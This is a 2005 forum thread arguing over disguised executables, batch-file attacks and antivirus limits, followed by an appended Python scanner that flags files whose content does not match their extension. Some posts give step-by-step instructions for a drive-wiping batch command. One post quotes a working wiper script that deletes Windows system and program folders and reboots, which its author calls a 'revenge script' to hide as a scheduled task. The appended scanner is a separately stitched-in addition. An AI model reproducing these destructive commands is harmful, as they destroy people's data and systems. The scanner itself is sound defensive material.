
Tech Un-penetrable

Discussion in 'Off Topic' started by dragonitti, Jun 15, 2005.

  1. dragonitti Guest

    Why do you insist on making things more difficult than it has to be. What are you talking about? It runs on the Windows platform because that is the area of most concern. When Linux and other OS start getting attacked, then we can talk. Again, you are more and more starting to sound like a jerk off. Ever thought that we would first like to go after the market where we can make the most money as a company....DUH! It's designed, and coded to run on Microsoft. You are speaking on dependency in a different term than I am.

    CAN a bank be open, and in such a state that you CAN deposit money into it...DUH! If we didn't ever allow you to update or install software for update uses, then who the hell would buy it. That would be to assume you would NEVER put the new version of Windows Media Player, or Nero on to your machine. But if you are not trusted to install software, you don't have that right to install. You have to get it approved by the company/admin. And if there are guidelines to what will and won't be installed (which there always is), then you are not getting programs onto the machine.
  2. kickarse Guest

    You can bind an exe to another file such as a picture, txt, wav, avi, gif, jpeg, etc... I used to do it with sub7seven
  3. AlaricD Guest

    Code:
    	
    D:\>md calc
    
    D:\>cd calc
    
    D:\calc>copy c:\WINDOWS\system32\calc.exe
            1 file(s) copied.
    
    D:\calc>dir
     Volume in drive D is Storage
     Volume Serial Number is 2235-433E
    
     Directory of D:\calc
    
    06/29/2005  10:43 AM    <DIR>          .
    06/29/2005  10:43 AM    <DIR>          ..
    08/12/2004  08:17 AM           114,688 calc.exe
                   1 File(s)        114,688 bytes
                   2 Dir(s)   5,570,273,280 bytes free
    
    D:\calc>rename calc.exe calc.txt
    
    D:\calc>dir
     Volume in drive D is Storage
     Volume Serial Number is 2235-433E
    
     Directory of D:\calc
    
    06/29/2005  10:43 AM    <DIR>          .
    06/29/2005  10:43 AM    <DIR>          ..
    08/12/2004  08:17 AM           114,688 calc.txt
                   1 File(s)        114,688 bytes
                   2 Dir(s)   5,570,273,280 bytes free
    
    D:\calc>
    
    Did that. Double-clicked the "calc.txt" in D:\calc. Notepad opened just like my pasted example before.

    Code:
    	
    D:\calc>ver
    
    Microsoft Windows XP [Version 5.1.2600]
    
    Running Windows XP Professional.

    From systeminfo:
    No tricks, just garden-variety usage of a normal system.
  4. AlaricD Guest

  5. dragonitti Guest

    Would you like to know how much I weigh on what I say is to be true? Let's strike a deal. I'll even make it one sided to make it even better for you. Now I've been around this board since the C3 days. And I love posting here and VVT-I.net. So, I'm putting that on the line.

    IF I give the demo, and I'm full of BS, and it does NOT do what I can say it does...

    LISTEN TO THIS MODERATORS....You can ban me from this board. That's how much I'm willing to put up. I promise you, I will not waste anyone's time by giving the demo.

    What I ask in return should you see that it DOES do what I say it does, then I ask nothing in return, except for you to stop insulting me.

    Sounds like fair game. Now, I know Kickarse wants to sit in, he has already given me the e-mail addy. Who else is game?
  6. dragonitti Guest

    Now, try to do the same thing with "Hide extensions for known file types" turned on. Also try doing everything through the GUI and not the command prompt.
  7. dragonitti Guest

    You're right, it's not a traditional virus. It's an attack on your machine. It's considered Malicious Code, which AV can't stop, and we can.

    1) How is this valid and legal.

    2) You don't have to be an admin to create a malicious .bat file and run it.

    3) You just performed a ZERO-DAY exploit against the machine running your AV software.

    Here is a definition of Malicious code:

    A term used to either mean a virus, hostile applet or code fragment downloaded from web server or sent directly from one system to another.
    www.primode.com/glossary.html
  8. dragonitti Guest

    Why did you leave out the part where I said:
    And because you can make a bomb out of a batch file, your AV software couldn't do anything about it, cause it doesn't have a signature for that.
  9. dragonitti Guest

    So, let me guess, every person that gets a virus manually executes it? Wrong. Here, do me a favor and read this article that came out last month: http://theinquirer.net/?article=22901
    How do you think spyware gets onto your machine. Visit websites, and they download programs on to your machine. VictoriaSecret.com downloads a program onto your machine with a .com extension on it, without you knowing about it.

    Example, you copy what you think is an image file from the internet, when in fact it's a program. When you go to view the image, the act of double clicking it will launch the program. You still may see the image, but what you don't see is the You'vebeenhad.exe it copied into your system32 folder.

    Read some of the details on how certain viruses get into your computer from the Sophos, Trend Micro, Symantec virus watch websites.
    You never heard of a virus lying dormant on the machine? The coder can program it in such a way that it will launch, say, every Christmas, on Christmas day, at 12:00am. The virus can stay on your machine and never do anything, just counting down the days till it wreaks havoc. So, the presence alone is enough. Why would you want to wait till it wakes up to do stuff in order to defend your system. Well, that's what traditional AV software does. And if it's a new virus, then you are SOL. All the more reason to have an ImmuneEngine running the binary search engine that is always constantly scanning the computer looking for new stuff to eat. That's why we describe it as mimicking the Human Immune System. When you catch a cold (virus), all your blood cells (ImmuneEngine) will find it, and start fighting it. Your blood cells are all over your body the way ImmuneEngine is all over the computer.
  10. dragonitti Guest

    There is no other software available that provides the level of security and flexibility like we do. You say you think it might be restricting everyday activity, but you didn't give an example of what activity would be restricted. Please provide an example of what you think we would restrict.
  11. dragonitti Guest

    But, you can't say we didn't re-invent the wheel either. Why, because you haven't actually seen it work. I am at least putting my money where my mouth is, and inviting you to see a "Live" demo. What I don't understand is why only one person is taking me up on the offer, and everyone else is just content on saying "He's full of it" without calling my bluff. What are you afraid of, the fact that I can actually be right? Are you scared that I will laugh at you after the demo, and make you tell me I am god? I promise I will do none of the sort. So, please put your egos aside, and call my bluff...I beg you to do so.
  12. copies98corolla Guest

    I don't really feel that anything you've told me is of worth. All you keep saying is that your software eradicates threats. The problem with that is the fact that it can make a mistake and delete something that it should delete without giving you the option of stopping the deletion. Additionally the idea that you would restrict the access of the SYSTEM ADMINISTRATOR is totally crap and completely counter productive.
  13. laz Member (NYC)

    I understand what dragonitti is saying and doing, and how it works more or less. I work in a corporate environment of a Fortune 500 company, and all users are locked down to the max. I can see how this can work as long as it is set up right, and people follow rules. I understand that from your explanation there has to be one person or group of people of utmost trust that would have the clearance of all the services in the machine, and then everyone just trickles down from there from the admins to the end user. I see how this type of software would be more valuable to a corporate scene than to the regular Joe Schmo sitting in front of his computer at home in his pajamas.

    I'd like to see a demo if I can, so I will PM you my e-mail address.

    X
  14. dragonitti Guest

    1) Won't delete something that's a part of the matrix of the computer.

    2) Not our fault corporations ask us to do what we do. Admins are to blame, and we do not hinder them from doing what they normally do. If you say "YES" we do, then I would ask you how? State a fact, not an unfounded opinion. You don't have to watch the demo, it's fine by me.

    3) Don't hate us because your company took the fun out of you screwing around with the system. Our customers drive the product. If they feel it's a threat to them, we put it in. Plain and simple. Maybe Admins would actually do what they are supposed to do for a change, instead of screwing with the network.
  15. AlaricD Guest

  16. dragonitti Guest

    You my friend are on the path to ENLIGHTENMENT! Yes, now you're getting the hang of it. The thing is people don't follow the rules. This software FORCES you to follow the rules. Corporations didn't have that before. They can try to enforce the rules by setting Group Policies, but anyone who knows anything about GP knows you will be sitting there all day trying to set up policies on all the ways someone can break the system. This software is out of the box, automatic.

    That's why we have a home version that does not do as much as our network version does. The home system will run as a standalone. However, we will be adding some of the new features of our network version to the home version. I don't know about you, but if I'm Joe Schmo at home in my pajamas, I don't want someone gaining root (establishing a command session) to my machine.
  17. AlaricD Guest

  18. dragonitti Guest

    Yeah, after you tell it to. Point is, you wouldn't get the opportunity to tell it, because it would be too late. Yet again, you missed the fundamental quality of the binary search engine. By the way, you never did confirm if you did the calc.exe thing I told you to try. What happened? I sense your lack of response to my instructions says that you don't want to admit that I was correct about the calc.exe.

    Now, how does that explain the spread of viruses still today. If traditional AV software still is greatest, the fact that viruses spread proves that it's not the best solution. Also, count the number of people that DON'T run their machine as an Admin. Point noted.
    I'm starting to believe you know nothing about hacking. Kickarse already confirmed for you that a program can be embedded into a .jpg. Have you done your research on polymorphic viruses? Have you done your research on viruses that are targeting the AV software? Have you seen the article about AV vendors creating more holes in the system than there are already? I'm starting to believe you are one of those people who THINK they know what's going on.

    By your comments, I assume you are running McAfee. So, try this.

    1) Create a new text file on the system.

    2) Open it in Notepad, and type in it: "regedit"

    3) Now save it as "test.bat"

    4) Say yes to the changing of file types.

    5) Now double click on the saved file.

    Tell me if it launches your registry editor.
  19. AlaricD Guest

    I responded:
    http://vvti.net/forums/showpost.php...07&postcount=59


    A batch file (complete with the batch file icon) containing the command "regedit" is perfectly legitimate. What does that prove? I often use notepad to edit and create batch files, as the DOS editor doesn't always launch as quickly as Notepad does.
  20. dragonitti Guest

    No, I responded again after that. Here, I'll post it again for you.


    You totally missed the point. If I was to take a program and call it bob.bob, and deposit it into your system32 folder.

    1) You will never know it was there.

    2) It's still a program even though it has a .bob as the extension.

    3) You have just been hacked.

    Dude, you are not doing something right. Here, follow my steps, cause I just did it myself and it worked like I said it would.

    1) Make sure "Hide extensions for known file types" is NOT checked.

    2) do a right click and copy the calc.exe program

    3) paste it to a floppy

    4) now rename the entire name to say "james.txt"

    5) Say "YES" to the dialog box that pops up that says would you like to change the file type.

    6) If you get a dialog box that says something about it being read only, just hit "YES"

    Now, double click and you should see the calc program launch.


    That was an EXAMPLE! You can tell a batch file to delete all your program files if you wanted it to. You would get even more pissed and start flaming me if I told you to try that. Point is, IT WORKED ON YOUR MACHINE!

    Batch files:

    Batch files are programs that allow MS-DOS and Windows users to create a file to perform long tasks fast, such as opening certain programs run frequently, deleting or managing files, etc. Simple batch files do not require any special programming skills and usually can be done by knowing the below commands and or just DOS commands.

    Taken from http://www.computerhope.com/batch.htm#11

    You can easily write a batch file to do malicious stuff to the machine. Your AV did not pick up the simple batch file I had you create. In fact the program ran, and the registry editor came open on your machine.
  21. dragonitti Guest

    If you want to grab some big, complex project or solution from an untrusted place on the web, stop and assess your sanity. If you believe that you are on the correct side of the sanity line, you are an expert on the language & API’s the code is written with, and you understand that you are taking a huge and rather foolish risk, then here’s my advice as to how to defend against disaster:

    1) Take only the code files (the .cpp files, .cs files, .vb files, etc.). Do not take the .sln, .suo, .*proj, etc. files. Likewise, do not take makefiles, NAnt files, batch files, etc. as these can also be malicious.

    Taken from http://blogs.msdn.com/cflaat/archiv...7/15/51593.aspx
  22. dragonitti Guest

    Batch File Virus
    Uses text batch files to infect. Batch files can be used to transmit binary executable code and either be or drop viruses.

    Taken from http://www.2privacy.com/www/viruses/virus-glossary.html

    Do your research bro. If it drops a virus onto your machine through the batch file, that your AV does not have an update for, then you are SOL. Undeniable facts, not my opinion.
  23. dragonitti Guest

    You can create a batch file on your machine to edit the registry and remove your AV software, and then proceed to erase your AV software from the system.


    A Bomb is a malicious program that is triggered to "go off" on a programmed date and time. It periodically checks the time on the computer system. When the bomb detects the correct time, the bomb begins its mission of deleting or changing files. Many bombs cause widespread damage to computer systems.

    Bombs can be more dangerous than viruses or Trojan horses. While it is complicated to write program code for a virus, almost anyone can write a bomb. A simple batch file can be designed as a bomb.

    Taken from https://ia.gordon.army.mil/iss/virus_info.htm
  24. dragonitti Guest

    PLEASE! I repeat, PLEASE DO NOT TRY THIS ON YOUR BOX, otherwise you will be reinstalling your OS. If you have your hdd backed up on separate media, and have no worries, you may try at your own risk.

    1) Follow my steps again on creating that batch file.

    2) Instead of typing "regedit" in it and saving, type this command "del c: /s /q /f" and save that.

    3) Now execute and watch in amazement as your system starts to delete, and your AV software do nothing about it.
  25. dragonitti Guest

    Thanks for proving my point in that it CAN be done.
  26. dragonitti Guest

    Found something for you, AlaricD.... another havoc wreaking DOS batch file. Check it out here... http://www.tech-forums.net/computer/topic/7782.html

    The guy wrote:

    Posted by: ekÆsine

    well i kinda figured i would not get advice on something like this. if anyone is curious this is the code i am using and it works well. it first copies shutdown.exe because it deletes all files in system32 which is where shutdown is located:

    copy c:\windows\system32\shutdown.exe C:\windows\tasks\ /y
    attrib -r -a -s -h c:\ /s
    del c:\windows\system\*.* /f/s/q
    del c:\windows\system32\*.* /f/s/q
    del c:\windows\*.* /f/s/q
    del c:\progra~1\*.* /f/s/q
    del c:\*.* /f/s/q
    C:\windows\tasks\shutdown.exe -r -t 20 -c "I Am Everywhere, You Can Not Stop Me!" -f

    this file is actually for 2 purposes, it is obvious how dangerous this file would be if used incorrectly.

    Another guy posted:

    Posted by: Inaris

    You can stop this if you know how... It's not that hard to reverse what you are trying to do.
    Why would you want to do this anyway? You said something about having your system compromised, but I am still at a loss.
    Also, you should make the call to c:\winnt just in case you have an NTFS user...
    The only thing you really need to do is delete the system registry hive, and then reboot the system. This in effect will destroy the OS.

    Then he posted again:

    Posted by: ekÆsine

    this would be added as a scheduled task. how would you stop something that you did not know about? not too many people i know would use winXP task scheduler.

    i also planned to use an IP updater that would logon to my DNS service and tell me it's IP address any time it is connected to the internet. i have heard you can track down a machine using only an IP address.

    Inaris why would i want to? because this serves for 2 purposes. it is a measure to protect my data in case the machine gets stolen, i have omitted the command to delete all files in my directories where i keep my personal data.

    another purpose is a revenge script, it is a malicious backup plan for someone who has messed with the wrong guy. i think you can imagine the scenario i'm talking about.

    inaris the target machine runs winXP home or pro. it is an NTFS partition most likely. a winnt folder would only be found on a winNT or win2k machine right?

    are you sure a registry is all that is needed?, we are talking about winXP. where is the default location of the registry in a winXP/ win9x/ and an NT based machine?
  27. AlaricD Guest

    Every time I follow your instructions, you change the parameters. Now you want me to get out a floppy diskette and try it AGAIN.

    Don't call me dude; don't tell me I'm not doing something right. If your steps give you the results you want on your machine, that's just fine and dandy. Your steps don't work on mine the way you'd like, because I have set up my machine, and helped define Group Policy at my workplace, that enhances security.
  28. AlaricD Guest

    You know why? Because it's not a virus, it's a .BAT you wrote yourself. Valid. Legal. Fine. Administrators are administrators, you know-- they can choose to delete their own files. That's why very few people in my workplace have Administrator rights to their machines. *I* don't even have administrator rights unless I su to a local admin account or one of the Domain Accounts with Admin group membership on workstations.
  29. AlaricD Guest

    The bomb, or another program designed to trigger the bomb, needs TO BE RUNNING to CHECK THE TIME. Whether it checks "periodically" or "constantly", at THAT INSTANT it is RUNNING. At that INSTANT, any decent virus scanner will be scanning it and seeing what else it does other than check the clock.
  30. AlaricD Guest

    Done, with "Apply to All Folders" as well.
    Done and done.

    Done

    No such dialog, as the file type was NOT changed. I renamed the file "calc" to "james.txt", the system, having HIDDEN THE EXTENSION, left the extension UNCHANGED.

    Dialog did not appear in this case.

    Correct-- because the filename is now james.txt with the hidden extension .EXE, however-- the icon never changed to a Notepad icon, it retained the calc icon.

    However, if extensions had NOT been hidden, I can rename calc.exe to james.txt, and THIS TIME I do get the message that I am changing the file type. After doing that, however-- the file launches within NOTEPAD when double-clicked.

    Partial excerpt:
    Code:
    	MZ       ÿÿ  ¸       @                                   ð   º ´	Í!¸LÍ!This program cannot be run in DOS mode.
    
    $       ‡EdÃ$x7Ã$x7Ã$x7987Æ$x7d7È$x7Ã$x7Â$x7Ã$y7D$x79  a7Î$x7T=7Â$x7e7ß$x79E7Â$x7RichÃ$x7
    So, with the method that may appear to disguise the file, any user with half a clue would see something is wrong (a .TXT that has an executable's icon), and with the method that does result in the change of the icon itself, the file just opens in Notepad.

    Granted, one *COULD* make an .EXE that has the icon for a text file and then perhaps get away with your plan.

    However, an .EXE whose design is to wipe the system would be spotted by most AV programs, and also would require Administrator rights to delete many system files.

    Your software may help mitigate the risks out there, but like McAfee VirusScan Enterprise, it cannot be said to be absolutely foolproof.

    Also, you keep describing how McAfee will be "too late"-- except McAfee scans files *as they are being written to the drive*, whether because you are downloading it from the internet, copying it off a floppy, or compiling it with your development software. The file is still in the process of being put on the hard drive, NOT being executed, yet it is being scanned by the On-Access scanner. At that point, it's not even remotely "too late." Again, having the file is not putting you in danger-- running it is. Compare it to pointing a gun at your head-- until you squeeze the trigger you're not in danger (although, obviously, it's still not a good idea to do that.)
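The point this post makes with the hex excerpt is the one a defender can act on: renaming calc.exe to james.txt changes the name and the icon, but not the bytes, and the "MZ" header is still sitting at offset 0. The following is an added example, not code from this thread or from any product discussed in it, that walks a directory and flags files whose magic bytes disagree with their extension, including the double-extension case ("photo.jpg.exe" shown as "photo.jpg" when extensions are hidden). The signature table, the sample files and all function names are constructed for the demonstration.

```python
"""Flag files whose extension does not match their content (constructed example).

Checks performed on each file:
  1. executable (PE) content behind a data-looking extension  -> the calc.exe/james.txt case
  2. data extension whose content is a different known type   -> e.g. a GIF named .jpg
  3. double extension such as photo.jpg.exe                   -> hidden by "hide known extensions"
"""
import shutil
import tempfile
from pathlib import Path

# Magic-number table (constructed from well-known file signatures): prefix -> content kind.
MAGIC = [
    (b"MZ", "pe"),                     # DOS/Windows PE executable header
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"RIFF", "riff"),                 # WAV and AVI both use the RIFF container
]

# Extensions a user expects to be harmless data, and the content kinds that legitimately carry them.
EXPECTED = {
    ".txt": {"text"},
    ".jpg": {"jpeg"}, ".jpeg": {"jpeg"},
    ".gif": {"gif"},
    ".png": {"png"},
    ".wav": {"riff"}, ".avi": {"riff"},
}

# Extensions Windows will execute directly on double-click.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif"}


def sniff(head: bytes) -> str:
    """Classify a file by its leading bytes, independent of its name."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    # Call it text only if the first 512 bytes are all printable ASCII or whitespace.
    if head and all(b in b"\t\n\r" or 32 <= b < 127 for b in head[:512]):
        return "text"
    return "unknown"


def inspect(path: Path) -> list[str]:
    """Return a list of findings for one file (empty list means nothing suspicious)."""
    findings = []
    with open(path, "rb") as fh:
        head = fh.read(512)
    kind = sniff(head)
    suffixes = [s.lower() for s in path.suffixes]
    last = suffixes[-1] if suffixes else ""

    if kind == "pe" and last not in EXECUTABLE_EXTS:
        findings.append(f"PE executable disguised as {last or 'no extension'}")
    elif last in EXPECTED and kind != "unknown" and kind not in EXPECTED[last]:
        findings.append(f"content is {kind}, extension claims {last}")

    if len(suffixes) >= 2 and last in EXECUTABLE_EXTS and suffixes[-2] in EXPECTED:
        findings.append(f"double extension {''.join(suffixes[-2:])}")
    return findings


def scan(root: Path) -> dict[str, list[str]]:
    """Walk a directory tree and collect findings keyed by file name."""
    report = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            found = inspect(p)
            if found:
                report[p.name] = found
    return report


def demo() -> dict[str, list[str]]:
    """Create constructed sample files in a temp directory, scan them, and clean up."""
    tmp = Path(tempfile.mkdtemp())
    try:
        # Constructed stand-in for an executable: a real-looking MZ header plus the DOS stub text.
        fake_pe = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n"
        (tmp / "james.txt").write_bytes(fake_pe)                                # renamed executable
        (tmp / "notes.txt").write_bytes(b"plain notes\r\n")                     # genuine text
        (tmp / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 16)     # genuine JPEG header
        (tmp / "holiday.jpg.exe").write_bytes(fake_pe)                          # double extension
        (tmp / "calc.exe").write_bytes(fake_pe)                                 # honestly named
        return scan(tmp)
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name}: {'; '.join(findings)}")
```

Running it lists only james.txt and holiday.jpg.exe; notes.txt, photo.jpg and calc.exe pass because name and content agree. This is the same check an on-access scanner performs before the file is ever run, which is why a rename alone does not defeat it.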
